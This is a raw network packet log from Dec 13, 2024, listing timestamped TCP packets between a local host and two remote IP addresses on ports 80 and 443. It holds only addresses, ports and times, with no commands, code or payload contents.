                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.374687910 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.374768019 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.374814034 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.377293110 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.377358913 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.377379894 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.377417088 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.379797935 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.379873991 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.379909039 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.379955053 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.382424116 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.382482052 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.382528067 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.382570028 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.385000944 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.385057926 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.385102034 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.385150909 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.387625933 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.387681961 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.387723923 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.387774944 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.390125990 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.390182972 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.390393972 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.390446901 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.392693996 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.392745018 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.503456116 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.503536940 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.503596067 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.503660917 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.504556894 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.504637003 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.504863977 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.504909992 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.504981041 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.505033016 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.507006884 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.507070065 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.507152081 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.507191896 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.509217024 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.509268999 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.509298086 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.509337902 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.511512041 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.511559010 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.511603117 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.511642933 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.513497114 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.513541937 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.513679028 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.513729095 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.515625000 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.515635967 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.515676975 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.515691996 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.517697096 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.517760992 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.517777920 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.517827988 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.519800901 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.519823074 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.519860029 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.519882917 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.521785975 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.521823883 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.521841049 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.521898985 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.523917913 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.523930073 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.523967981 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.524000883 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.526016951 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.526067972 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.526295900 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.526345015 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.528178930 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.528227091 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.528309107 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.528359890 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.530289888 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.530340910 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.530463934 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.530512094 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.532176018 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.532222033 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.532259941 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.532303095 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.534153938 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.534203053 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.534291983 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.534337044 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.536307096 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.536354065 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.536513090 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.536556959 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.538314104 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.538357019 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.538362980 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.538393021 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.540383101 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.540431976 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.540447950 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.540491104 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.542535067 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.542546034 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.542588949 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.542588949 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.544480085 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.544569969 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.544812918 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.544863939 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.546607971 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.546653032 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.546659946 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.546689987 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.548640966 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.548690081 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.548698902 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.548738003 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.550662041 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.550719023 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.550800085 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.550843954 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.552699089 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.552766085 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.552840948 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.552896023 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.554739952 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.554802895 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.554824114 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.554874897 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.556812048 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.556874037 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.557005882 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.557054043 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.558875084 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.558933020 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.558979988 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.559025049 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.560939074 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.560997963 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.561137915 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.561182976 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.563036919 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.563102961 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.563139915 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.563186884 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.565148115 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.565201044 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.565248013 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.565289974 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.567228079 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.567279100 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.567329884 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.567368031 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.569423914 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.569470882 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.569555998 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.569600105 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.571281910 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.571342945 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.571382046 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.571424961 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.573283911 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.573328972 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.573376894 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.573421001 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.575401068 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.575463057 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.575484037 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.575530052 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.577564001 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.577611923 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.577617884 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.577697039 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.579543114 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.579592943 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.579777956 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.579823017 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.581619978 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.581674099 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.581739902 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.581792116 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.583676100 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.583723068 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.583728075 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.583761930 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.585736036 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.585782051 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.586005926 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.586046934 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.587766886 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.587816954 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.587816000 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.587855101 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.590053082 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.590097904 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.590178967 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.590220928 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.590516090 CET44349764116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.590578079 CET49764443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.591984034 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.592034101 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.592045069 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.592087984 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.593899012 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.593945026 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.593993902 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.594002008 CET49764443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.594021082 CET44349764116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.594033957 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.594320059 CET44349764116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.594372034 CET49764443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.594686031 CET49764443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.595962048 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.596004009 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.596070051 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.596107006 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.598439932 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.598450899 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.598486900 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.600184917 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.600228071 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.600228071 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.600270033 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.602219105 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.602256060 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.602278948 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.602313995 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.604206085 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.604245901 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.604379892 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.604415894 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.606251001 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.606292009 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.606381893 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.606419086 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.608926058 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.608964920 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.608997107 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.609034061 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.639333963 CET44349764116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.695785999 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.695879936 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.695935011 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.695980072 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.696254969 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.696305990 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.696320057 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.696367025 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.697840929 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.697853088 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.697895050 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.697918892 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.699570894 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.699613094 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.699621916 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.699646950 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.701303959 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.701356888 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.701395988 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.701435089 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.703061104 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.703072071 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.703114986 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.703133106 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.704721928 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.704777002 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.704912901 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.704957008 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.706446886 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.706474066 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.706506968 CET4976380192.168.2.431.41.244.11
